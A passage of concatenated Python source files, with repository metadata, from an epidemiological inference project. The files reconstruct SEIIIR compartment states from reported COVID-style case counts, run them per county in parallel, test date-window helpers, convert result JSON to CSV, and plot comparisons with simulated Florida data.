transmissions.dates\n transmissions = transmissions.values\n\n # create lists to store compartment numbers\n S = [None]*len(transmissions)\n E = [None]*len(transmissions)\n I1 = [None]*len(transmissions)\n I2 = [None]*len(transmissions)\n I3 = [None]*len(transmissions)\n R = [None]*len(transmissions)\n\n # assume fully susceptible population to start\n S[0] = population\n E[0] = 0\n I1[0] = 0\n I2[0] = 0\n I3[0] = 0\n R[0] = 0\n\n # main simulation loop\n for t in range(len(transmissions)-1):\n delta0 = transmissions[t]\n if delta0 > S[t] and not warnings is None:\n warnings.append(\"WARNING: Cases in county %s exceeded population size (%f > %f) at time step %d. Ignoring cases that exceed population size.\" % (str(county), delta0, S[t], t))\n delta0 = S[t]\n S[t+1] = S[t] - delta0\n #if S[t+1] <= 0:\n # # print(sum(reported_cases_per_day))\n # # print(cumulative_reported_cases[-1])\n # # print(population)\n # # for idx,d in enumerate(tdates):\n # # print(d,':',S[idx], '->', transmissions[idx])\n # raise ValueError(\"reconstruct_states_deterministic_decay computed a negative\"\n # \" value for the susceptible population. This likely means that\"\n # \" the reported cases or the reporting_factor are too large\"\n # \" for the population value specified. This happened at \"\n # \"timestep: {} with date: {}, transmissions: {}, and S[t+1]: {}\".format(\n # t, rdates[t], transmissions[t], S[t+1])\n # )\n \n delta1 = min(sigma*E[t], E[t] + delta0)\n E[t+1] = E[t] + delta0 - delta1\n #E[t+1] = E[t] + transmissions[t] - sigma*E[t]\n #E[t+1] = max(0, E[t+1])\n assert E[t+1] >= 0\n\n delta2 = min(gamma*3*I1[t], I1[t] + delta1)\n I1[t+1] = I1[t] + delta1 - delta2\n #I1[t+1] = I1[t] + sigma*E[t] - gamma*3*I1[t]\n #I1[t+1] = max(0, I1[t+1])\n assert I1[t+1] >= 0\n \n delta3 = min(gamma*3*I2[t], I2[t] + delta2)\n I2[t+1] = I2[t] + delta2 - delta3\n #I2[t+1] = I2[t] + gamma*3*I1[t] - gamma*3*I2[t]\n #I2[t+1] = max(0, I2[t+1])\n assert I2[t+1] >= 0\n \n delta4 = min(gamma*3*I3[t], I3[t] + delta3)\n I3[t+1] = I3[t] + delta3 - delta4\n #I3[t+1] = I3[t] + gamma*3*I2[t] - gamma*3*I3[t]\n #I3[t+1] = max(0, I3[t+1])\n assert I3[t+1] >= 0\n \n R[t+1] = R[t] + delta4\n #R[t+1] = R[t] + gamma*3*I3[t]\n assert R[t+1] >= 0\n\n\n orig_rep_cases = list()\n drdict = {d:r for d,r in zip(dates,reported_cases_per_day)}\n for dt in transmission_dates:\n if dt in drdict:\n orig_rep_cases.append(drdict[dt])\n else:\n orig_rep_cases.append(0)\n\n return Bunch(dates=transmission_dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=transmissions, orig_rep_cases=orig_rep_cases)\n\ndef np_reconstruct_states_deterministic_decay(*, dates, counties, reported_cases_per_day, populations, sigma, gamma, reporting_factor, report_delay):\n \"\"\"\n This function reconstructs the state of the system using the\n cumulative reported cases and assuming a constant reporting\n delay. Using this and the reporting factor, we can compute the\n approximate transmissions each day. These are then used to\n reconstruct the other states, assuming a discrete time model with\n a simple decay term for leaving the E, I1, I2, and I3\n compartments. The model is discretized by days.\n \n Parameters\n ----------\n dates : numpy array of datetime objects\n array of datetime objects corresponding to the rows of reported_cases_per_day\n counties : numpy array of objects (strings)\n the names of the counties (or nodes) corresponding to the coumns in the\n reported_cases_per_day\n reported_cases_per_day : Numpy two-dimensional array\n This is a numpy array that contains the reported cases per day. Each row\n corresponds to a different day, and each column is a different county (node).\n populations : numpy array of populations\n This is an array of populations. Each entry corresponds to one of the counties\n sigma : float\n This is the rate of transfer out of the exposed compartment (e.g., 1/(incubation period))\n gamma : float\n This model includes 3 infectious compartments. Therefore this is an approximation of the \n overall rate of transfer out of the I compartment. Here, we create three compartments,\n each with a rate of 3*gamma (where gamma is 1/(infectious period))\n reporting_factor : float\n This factor accounts for under-reporting. If reporting_factor=8, then 1 in 8 cases are reported\n\n report_delay : int\n This is the number of days between infection and reporting\n\n Returns\n -------\n Bunch : (like a dict with keys: dates, S, E, I1, I2, I3, R, transmissions)\n dates: dates corresponding to the states in the model\n S: numpy array of susceptible population values\n E: numpy array of exposed population values\n I1, I2, I3: numpy arrays of infective counts in I1, I2, and I3 compartments respectively\n R: numpy array of recovered population values\n transmissions: numpy array of transmissions (from S->E) \n \"\"\"\n # check the types\n assert isinstance(dates, np.ndarray) and dates.dtype == np.object\n assert isinstance(counties, np.ndarray) and counties.dtype == np.object\n assert isinstance(reported_cases_per_day, np.ndarray) and reported_cases_per_day.dtype == np.float\n \n ndates = len(dates)\n ncounties = len(counties)\n assert reported_cases_per_day.shape[0] == ndates\n assert reported_cases_per_day.shape[1] == ncounties\n \n assert np.all(populations > 0)\n assert sigma >=0\n assert gamma >= 0\n assert reporting_factor >= 1\n assert report_delay >= 1 and type(report_delay) is int\n\n transmissions = \\\n _np_transmissions_from_reported_cases(dates=dates,\n counties=counties,\n reported_cases_per_day=reported_cases_per_day,\n reporting_factor=reporting_factor,\n report_delay=report_delay)\n transmission_dates = transmissions.dates\n transmissions = transmissions.values\n\n # create arrays to store compartment numbers\n S = np.NaN*np.zeros((ndates,len(counties)))\n E = np.NaN*np.zeros((ndates,len(counties)))\n I1 = np.NaN*np.zeros((ndates,len(counties)))\n I2 = np.NaN*np.zeros((ndates,len(counties)))\n I3 = np.NaN*np.zeros((ndates,len(counties)))\n R = np.NaN*np.zeros((ndates,len(counties)))\n\n # assume fully susceptible population to start\n S[0,:] = populations\n E[0,:] = 0\n I1[0,:] = 0\n I2[0,:] = 0\n I3[0,:] = 0\n R[0,:] = 0\n \n # main simulation loop\n for t in range(ndates-1):\n delta0 = transmissions[t,:]\n if np.any(delta0 > S[t,:]):\n print(\"WARNING: cases exceeded population size. Ignoring cases that exceed population size.\")\n delta0 = np.minimum(delta0, S[t,:])\n S[t+1,:] = S[t,:] - delta0\n \n delta1 = np.minimum(sigma*E[t,:], E[t,:] + delta0)\n E[t+1,:] = E[t,:] + delta0 - delta1\n\n delta2 = np.minimum(gamma*3*I1[t,:], I1[t,:] + delta1)\n I1[t+1,:] = I1[t,:] + delta1 - delta2\n \n delta3 = np.minimum(gamma*3*I2[t,:], I2[t,:] + delta2)\n I2[t+1,:] = I2[t,:] + delta2 - delta3\n \n delta4 = np.minimum(gamma*3*I3[t,:], I3[t,:] + delta3)\n I3[t+1,:] = I3[t,:] + delta3 - delta4\n \n R[t+1,:] = R[t,:] + delta4\n\n assert np.any(np.isfinite(S))\n assert np.any(np.isfinite(E))\n assert np.any(np.isfinite(I1))\n assert np.any(np.isfinite(I2))\n assert np.any(np.isfinite(I3))\n assert np.any(np.isfinite(R))\n assert np.any(np.isfinite(transmissions))\n \n return Bunch(dates=transmission_dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=transmissions)\n\n" }, { "alpha_fraction": 0.6107514500617981, "alphanum_fraction": 0.6133019328117371, "avg_line_length": 32.973331451416016, "blob_id": "75076abba2be9e2dbb8d7820e559d0403b28874a", "content_id": "be1d00a25c9272e30598d1d412b3721529ab80a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5097, "license_type": "no_license", "max_line_length": 180, "num_lines": 150, "path": "/epi_inference/workflow/precon_deterministic_delay_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\nimport datetime\nimport pandas as pd\nfrom pyutilib.misc import timing\ntry:\n import joblib\n joblib_available = True\nexcept:\n joblib_available = False\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..util import load_population, save_results\nfrom ..collect.misc import load_collect\nfrom ..reconstruction.deterministic import reconstruct_states_deterministic_decay\nfrom ..reconstruction.common import reported_cases_from_cumulative\n\n\ndef run_county(county, df, population, CONFIG, warnings):\n #\n # Initialize results dictionary\n #\n results = {'FIPS':county}\n for key, value in CONFIG.get('factor_levels',{}).items():\n if not key in results:\n results[key] = value\n #\n # Get the cumulative cases\n #\n cumulative_reported_cases = df[county].to_list()\n if df[county][-1] == 0:\n warnings.append( \"WARNING: County %s has no reported cases\" % str(county))\n return results\n\n # reconstruct the states\n Cdates = [datetime.date.fromisoformat(day) for day in df.index.to_list()]\n reported_cases_per_day = \\\n reported_cases_from_cumulative(dates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases)\n\n res = reconstruct_states_deterministic_decay(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values,\n population=population,\n sigma=CONFIG['sigma'],\n gamma=CONFIG['gamma']/3,\n reporting_factor=CONFIG['reporting_factor'],\n report_delay=CONFIG['deltaP'])\n\n # TODO - keep rdates and rcases?\n #results['rdates'] = reported_cases_per_day.dates\n #results['rcases'] = reported_cases_per_day.values\n results['dates'] = res.dates\n results['T'] = res.transmissions\n results['S'] = res.S\n results['E'] = res.E\n results['I1'] = res.I1\n results['I2'] = res.I2\n results['I3'] = res.I3\n results['R'] = res.R\n results['population'] = population\n\n return results\n\n\ndef run(CONFIG, warnings):\n #\n # Load the population data\n #\n population_df = load_population(CONFIG['population_csv']['file'], CONFIG['population_csv']['index'])\n #\n # Load the case data \n #\n df = load_collect(CONFIG['input_csv'])\n #\n # Perform construction\n #\n results = []\n if 'county' in CONFIG:\n counties = [CONFIG['county']]\n else:\n counties = list(df.keys())\n\n parallel = ('parallel' in CONFIG) and (len(counties) >= CONFIG['parallel'].get('number_of_counties',10))\n\n if parallel and np > 1:\n if CONFIG['verbose']:\n timing.tic()\n available_counties = []\n for t in counties:\n if t not in population_df[CONFIG['population_csv']['population']]:\n warnings.append(\"WARNING: county %s does not have population data available\" % str(t))\n continue\n available_counties.append(t)\n np = CONFIG['parallel'].get('np',2)\n if CONFIG['verbose']:\n timing.toc(\"Parallel Setup\")\n #\n with joblib.Parallel(n_jobs=np) as parallel:\n unordered_results = parallel( joblib.delayed(run_county)(t, df, population_df[CONFIG['population_csv']['population']][t], CONFIG, warnings) for t in available_counties)\n if CONFIG['verbose']:\n timing.toc(\"Parallel Execution\")\n #\n # Order the results\n #\n tmp = {res['FIPS'] : res for res in unordered_results}\n for t in available_counties:\n results.append( tmp[t] )\n if CONFIG['verbose']:\n timing.toc(\"Reorder Results\")\n else:\n if CONFIG['verbose']:\n timing.tic()\n for t in counties:\n if t not in population_df[CONFIG['population_csv']['population']]:\n warnings.append(\"WARNING: county %s does not have population data available\" % str(t))\n continue\n results.append( run_county(t, df, population_df[CONFIG['population_csv']['population']][t], CONFIG, warnings) )\n if CONFIG['verbose']:\n timing.tic(\"Serial Execution\")\n #\n # Save results\n #\n save_results(results, CONFIG['output_json'])\n save_metadata(CONFIG, warnings)\n\n\nclass ParallelReconstructionDeterministicDelay(Task):\n\n def __init__(self):\n Task.__init__(self, \"parallel_reconstruction_deterministic_delay\",\n \"Perform compartment reconstruction using a deterministic delay.\")\n\n def validate(self, args):\n pass\n\n def run(self, data, CONFIG):\n if not joblib_available:\n raise RuntimeError(\"ERROR: Cannot execute the parallel_reconstruction_determinstic_delay workflow. The 'joblib' package is missing.\")\n self._warnings = []\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(ParallelReconstructionDeterministicDelay())\n\n" }, { "alpha_fraction": 0.4978303611278534, "alphanum_fraction": 0.5854043364524841, "avg_line_length": 35.73188400268555, "blob_id": "6c4d1a236f94d88031fcac90f39621ac7b2dc9f0", "content_id": "959422026bf00111bafbaa3803dbd99d4b22a157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5070, "license_type": "no_license", "max_line_length": 78, "num_lines": 138, "path": "/epi_inference/formulations/tests/test_unit.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport shutil\nimport datetime\n\n#from pyomo.common import fileutils as fileutils\n#from pyutilib.misc import Options as Options\nfrom epi_inference.formulations.util import get_windows\nfrom epi_inference.formulations.util import indices_since_first_nonzero\n\nclass TestWindow():\n\n def test1(self):\n # Default values\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates)\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [11,18])\n wt = {11: [5, 6, 7, 8, 9, 10, 11], 18: [12, 13, 14, 15, 16, 17, 18]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n\n def test2(self):\n # Selected a date that wasn't a valid window\n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, select_window='2020-06-14')\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [])\n wt = {}\n assert(ans.WINDOW_TIMES == wt)\n\n def test3(self):\n # Selected a valid date \n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, select_window='2020-06-13')\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [18])\n wt = {18: [12, 13, 14, 15, 16, 17, 18]}\n assert(ans.WINDOW_TIMES == wt)\n\n def Xtest4_fails(self):\n # Shouldn't this pass?\n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, window_days=5)\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [4, 11,18])\n wt = {4: [0,1,2,3,4], 11: [7, 8, 9, 10, 11], 18: [14, 15, 16, 17, 18]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n\n def test4_succeeds(self):\n # Why isn't the first window included?\n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, window_days=5)\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [11,18])\n wt = {11: [7, 8, 9, 10, 11], 18: [14, 15, 16, 17, 18]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n\n\n def test5(self):\n # Shouldn't this pass?\n last = datetime.date.fromisoformat('2020-06-14')\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-29)) for i in range(30)]\n ans = get_windows(dates, window_days=14)\n\n assert(ans.TIMES == list(range(30)))\n assert(ans.WINDOWS == [14, 21, 28])\n wt = {14: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],\n 21: [8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],\n 28: [15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n\n def test6(self):\n # Default values\n last = datetime.date.fromisoformat('2020-06-14')\n dates=[str(last+datetime.timedelta(days=i-19)) for i in range(20)]\n ans = get_windows(dates, last_day_of_window=6) # Monday - Sunday\n\n assert(ans.TIMES == list(range(20)))\n assert(ans.WINDOWS == [12,19])\n wt = {12: [6, 7, 8, 9, 10, 11, 12], 19: [13, 14, 15, 16, 17, 18, 19]}\n assert(ans.WINDOW_TIMES == wt)\n assert(ans.WINDOW_TIMES_LIST == [(i,j) for i in wt for j in wt[i]])\n \ndef test_indices_since_first_nonzero():\n data = [0]*100\n data[95] = 1\n indices = indices_since_first_nonzero(data)\n\n #assert sum(indices) == 15\n #assert sum(indices[:93]) == 0\n expected = [0]*100\n expected[95] = 0\n expected[96] = 1\n expected[97] = 2\n expected[98] = 3\n expected[99] = 4\n print(indices)\n print(expected)\n for i in range(100):\n assert indices[i] == expected[i]\n \ndef test_indices_since_first_nonzero_zero():\n data = [0]*100\n indices = indices_since_first_nonzero(data)\n assert len(indices) == 100\n print(indices)\n for v in indices:\n assert v == 0\n\ndef test_indices_since_first_nonzero_filled():\n data = [1]*100\n indices = indices_since_first_nonzero(data)\n assert len(indices) == 100\n expected = [i for i in range(100)]\n print(indices)\n print(expected)\n for i in range(100):\n assert indices[i] == expected[i]\n\n" }, { "alpha_fraction": 0.528663158416748, "alphanum_fraction": 0.5316365361213684, "avg_line_length": 32.494022369384766, "blob_id": "1123a2ae78f9aa71df221520861d0a58451137e6", "content_id": "e7119a0db5661ee736a3e3ca4ab1927fbcb62764", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8408, "license_type": "no_license", "max_line_length": 141, "num_lines": 251, "path": "/epi_inference/reconstruction/recon_json2csv_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['recon_single_json2csv', 'recon_many_json2csv']\n\nimport sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport csv\nimport glob\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef write_wide(OUTPUT, raw, counties):\n counties = set(counties)\n OUTPUT.write('comp,')\n sorted_fips = list(sorted(raw.keys()))\n for fips in sorted_fips:\n if fips not in counties:\n continue\n OUTPUT.write('\"%s\",' % fips)\n OUTPUT.write(\"time\\n\")\n for d in range(len(raw[fips]['dates'])):\n for s in ['S', 'E', 'I1', 'I2', 'I3', 'R']:\n OUTPUT.write('\"%s\",' % s)\n for fips in sorted_fips:\n if fips not in counties:\n continue\n OUTPUT.write(\"%s,\" % str(raw[fips][s][d]))\n OUTPUT.write('\"%s\"\\n' % raw[fips]['dates'][d])\n\n\ndef write_flattened(OUTPUT, input_json_files, counties):\n counties = set(counties)\n first = True\n series = ['dates', 'transmissions', 'S', 'E', 'I1', 'I2', 'I3', 'R', 'orig_rep_cases']\n values = []\n\n for filename in glob.glob(input_json_files):\n if not os.path.exists(filename):\n raise RuntimeError(\"ERROR: Reconstruction JSON file does not exist: \"+ filename)\n #\n with open(filename,'r') as INPUT:\n raw = json.load(INPUT)\n\n if first:\n #\n # Process the first JSON file\n #\n if len(counties) == 0:\n counties = list(sorted(raw.keys()))\n for fips in raw:\n curr = raw[fips]\n if 'E' not in curr:\n continue\n for key in sorted(curr.keys()):\n if key in series or key in values:\n continue\n elif key != \"FIPS\":\n values.append( key )\n break\n #\n OUTPUT.write(\"FIPS,\"+\",\".join(values+series))\n OUTPUT.write(\"\\n\")\n first=False\n\n rows = []\n for fips in counties:\n if not fips in raw:\n continue\n for d in range(len(raw[fips]['dates'])):\n row = []\n row.append('\"%s\"' % fips)\n for val in values:\n row.append('%s' % str(raw[fips][val]))\n for s in series:\n row.append('%s' % str(raw[fips][s][d]))\n rows.append(\",\".join(row))\n OUTPUT.write(\"\\n\".join(rows))\n OUTPUT.write(\"\\n\")\n sys.stdout.write(\".\")\n sys.stdout.flush()\n\n sys.stdout.write(\"\\n\")\n\n\ndef write_narrow(OUTPUT, input_json_files, counties):\n counties = set(counties)\n first = True\n series = ['transmissions', 'S', 'E', 'I1', 'I2', 'I3', 'R', 'orig_rep_cases']\n values = []\n\n for filename in glob.glob(input_json_files):\n if not os.path.exists(filename):\n raise RuntimeError(\"ERROR: Reconstruction JSON file does not exist: \"+ filename)\n #\n with open(filename,'r') as INPUT:\n raw = json.load(INPUT)\n\n if first:\n #\n # Process the first JSON file\n #\n if len(counties) == 0:\n counties = list(sorted(raw.keys()))\n for fips in raw:\n curr = raw[fips]\n if 'E' not in curr:\n continue\n for key in sorted(curr.keys()):\n if key in series or key in values or key == 'dates':\n continue\n elif key != \"FIPS\":\n values.append( key )\n break\n #\n OUTPUT.write(\"fips,\"+\",\".join(values)+\",date,series,value\")\n OUTPUT.write(\"\\n\")\n first=False\n\n rows = []\n for fips in counties:\n if not fips in raw:\n continue\n prefix = []\n prefix.append('\"%s\"' % fips)\n for val in values:\n prefix.append('%s' % str(raw[fips][val]))\n for d in range(len(raw[fips]['dates'])):\n for s in series:\n appendix = ['%s' % str(raw[fips]['dates'][d]), \n s,\n '%s' % str(raw[fips][s][d])]\n rows.append(\",\".join(prefix+appendix))\n OUTPUT.write(\"\\n\".join(rows))\n OUTPUT.write(\"\\n\")\n sys.stdout.write(\".\")\n sys.stdout.flush()\n\n sys.stdout.write(\"\\n\")\n\n\ndef recon_single_json2csv(input_json, output_csv=None, datadir=None, csv_format=None, counties=None):\n if datadir:\n full_infile = os.path.join(datadir, input_json)\n else:\n full_infile = input_json\n if not os.path.exists(full_infile):\n raise RuntimeError(\"ERROR: Reconstruction JSON file does not exist: \"+ full_infile)\n #\n print(\"Processing reconstruction file: \"+full_infile)\n with open(full_infile,'r') as INPUT:\n raw = json.load(INPUT)\n\n # Figure out CSV output filename\n if output_csv:\n pass\n elif input_json.endswith('jsn'):\n output_csv = input_json[:-4]+\".csv\"\n elif input_json.endswith('json'):\n output_csv = input_json[:-5]+\".csv\"\n else:\n raise RuntimeError(\"ERROR: Cannot infer CSV output file name\")\n if datadir:\n full_outfile = os.path.join(datadir,output_csv)\n else:\n full_outfile = output_csv\n\n # Write CSV file\n print(\"Writing results summary: \"+full_outfile)\n if csv_format == 'wide':\n with open(full_outfile,'w') as OUTPUT:\n write_wide(OUTPUT, raw, counties)\n elif csv_format == 'flatten':\n with open(full_outfile,'w') as OUTPUT:\n write_flattened(OUTPUT, full_infile, counties)\n else:\n with open(full_outfile,'w') as OUTPUT:\n write_narrow(OUTPUT, full_infile, counties)\n\n\ndef recon_many_json2csv(input_json_files, output_csv=None, datadir=None, counties=None, csv_format=None):\n # Figure out CSV output filename\n if datadir:\n full_outfile = os.path.join(datadir,output_csv)\n else:\n full_outfile = output_csv\n\n # Write CSV file\n print(\"Writing results summary: \"+full_outfile)\n if csv_format == 'flatten':\n with open(full_outfile,'w') as OUTPUT:\n write_flattened(OUTPUT, input_json_files, counties)\n else:\n with open(full_outfile,'w') as OUTPUT:\n write_narrow(OUTPUT, input_json_files, counties)\n\n\nclass Recon_JSON2CSV_Workflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"recon_json2csv\",\n \"Convert reconstruction JSON to CSV.\")\n\n def validate(self, CONFIG):\n valid_options = set(['format', 'input_json', 'counties', 'output_csv', 'datadir', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n recon_single_json2csv(\n CONFIG['input_json'],\n output_csv=CONFIG.get('output_csv',None),\n datadir=CONFIG.get('datadir',None),\n counties=CONFIG.get('counties',[]),\n csv_format=CONFIG.get('format','narrow'))\n\n\nregister_task(Recon_JSON2CSV_Workflow())\n\n\nclass Recon_Many_JSON2CSV_Workflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"recon_many_json2csv\",\n \"Create a CSV file summarizing reconstructions in JSON files.\")\n\n def validate(self, CONFIG):\n valid_options = set(['format', 'input_json', 'counties', 'output_csv', 'datadir', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n recon_many_json2csv(\n CONFIG['input_json'],\n counties=CONFIG.get('counties',[]),\n output_csv=CONFIG.get('output_csv',None),\n datadir=CONFIG.get('datadir',None),\n csv_format=CONFIG.get('format','narrow'))\n\n\nregister_task(Recon_Many_JSON2CSV_Workflow())\n\n" }, { "alpha_fraction": 0.6085843443870544, "alphanum_fraction": 0.6194366812705994, "avg_line_length": 45.834285736083984, "blob_id": "b60a7c76e1e00ec2f204905e311a0ca665eef0ba", "content_id": "eb53785d6756480998f266517bf8d2baca991173", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8201, "license_type": "no_license", "max_line_length": 152, "num_lines": 175, "path": "/epi_inference/evaluation/reconstruction/florida-epiinf/bin/reconstruction_figs.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\npd.set_option(\"display.max_rows\", None)\nimport os\nfrom epi_inference.reconstruction.common import reported_cases_from_cumulative\nfrom epi_inference.reconstruction.stochastic import stochastic_reconstruction\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n\"\"\"\nThis module runs reconstructions on data from a stochastic simulation\nand produces some figures showing the results.\n\"\"\"\n\ndef compare_florida_reconstruction(seiiir_fname, det_recon_fname, recon_folder_name, geodata_fname, output_path):\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n # read the true data from the SEIIIR simulation\n seirdf = pd.read_csv(seiiir_fname, parse_dates=['Date'])\n seirdf['Date'] = pd.to_datetime(seirdf['Date'])\n seirdf = seirdf.set_index('Date')\n\n # read the deterministic reconstruction\n detrecondf = pd.read_csv(det_recon_fname, parse_dates=['time'])\n detrecondf['Date'] = pd.to_datetime(detrecondf['time'])\n detrecondf = detrecondf.set_index('Date')\n\n # read the populations\n popdf = pd.read_csv(geodata_fname)\n popdf = popdf.set_index('geoid')\n populations = popdf['pop2010'].to_dict()\n populations = {str(int(k)):v for k,v in populations.items()}\n \n # get the list of counties\n counties = set(seirdf.columns.to_list())\n if 'Date' in counties:\n counties.remove('Date')\n counties.remove('comp')\n counties = sorted(counties)\n\n # get a list of all the files in the recon folder\n recon_files = list()\n for f in os.listdir(recon_folder_name):\n fname = os.path.join(recon_folder_name, f)\n if os.path.isfile(fname):\n filenameonly, extension = os.path.splitext(f)\n if extension == '.csv':\n recon_files.append(fname)\n\n # loop through all the counties and perform the reconstruction\n # based on the reported cases\n pdf = PdfPages(os.path.join(output_path, 'reconstruction-comparison-florida.pdf'))\n for c in counties:\n # this is expensive - we are opening the files for each county\n print('...', c)\n dfsim_S = pd.DataFrame(seirdf[seirdf['comp'] == 'S'][c])\n dfsim_E = seirdf[seirdf['comp'] == 'E'][c]\n dfsim_I1 = seirdf[seirdf['comp'] == 'I1'][c]\n dfsim_I2 = seirdf[seirdf['comp'] == 'I2'][c]\n dfsim_I3 = seirdf[seirdf['comp'] == 'I3'][c]\n dfsim_R = seirdf[seirdf['comp'] == 'R'][c]\n\n dfdetrecon_S = detrecondf[detrecondf['comp']=='S'][c]\n dfdetrecon_E = detrecondf[detrecondf['comp']=='E'][c]\n dfdetrecon_I1 = detrecondf[detrecondf['comp']=='I1'][c]\n dfdetrecon_I2 = detrecondf[detrecondf['comp']=='I2'][c]\n dfdetrecon_I3 = detrecondf[detrecondf['comp']=='I3'][c]\n dfdetrecon_R = detrecondf[detrecondf['comp']=='R'][c]\n\n dfrecon_S = None\n dfrecon_E = None\n dfrecon_I1 = None\n dfrecon_I2 = None\n dfrecon_I3 = None\n dfrecon_R = None\n\n idx = 0\n for rfname in recon_files:\n recondf = pd.read_csv(rfname)\n recondf = recondf.rename({'time':'Date'}, axis='columns')\n recondf.set_index('Date')\n \n tempdf = recondf[recondf['comp']=='S'].set_index('Date')\n if dfrecon_S is None:\n dfrecon_S = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_E = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_I1 = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_I2 = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_I3 = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n dfrecon_R = pd.DataFrame({'Date': tempdf.index}).set_index('Date')\n\n tempdf = recondf[recondf['comp']=='S'].set_index('Date')\n dfrecon_S['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='E'].set_index('Date')\n dfrecon_E['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='I1'].set_index('Date')\n dfrecon_I1['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='I2'].set_index('Date')\n dfrecon_I2['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='I3'].set_index('Date')\n dfrecon_I3['realization_{}'.format(idx)] = tempdf[c]\n tempdf = recondf[recondf['comp']=='R'].set_index('Date')\n dfrecon_R['realization_{}'.format(idx)] = tempdf[c]\n idx += 1\n \n dfrecon_S.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_S.plot(color='silver', legend=False)\n dfsim_S[dfsim_S.index.isin(dfrecon_S.index)].plot(ax=ax, color='black', legend='Simulated S')\n dfdetrecon_S[dfdetrecon_S.index.isin(dfrecon_S.index)].plot(ax=ax, color='red', legend='Deterministic_Recon S')\n plt.title('S comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_E.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_E.plot(color='silver', legend=False)\n dfsim_E[dfsim_E.index.isin(dfrecon_E.index)].plot(ax=ax, color='black', legend='Simulated E')\n dfdetrecon_E[dfdetrecon_E.index.isin(dfrecon_E.index)].plot(ax=ax, color='red', legend='Deterministic_Recon E')\n plt.title('E comparison')\n pdf.savefig()\n plt.close()\n\n dfrecon_I1.index = pd.to_datetime(dfrecon_S.index)\n ax = dfrecon_I1.plot(color='silver', legend=False)\n dfsim_I1[dfsim_I1.index.isin(dfrecon_I1.index)].plot(ax=ax, 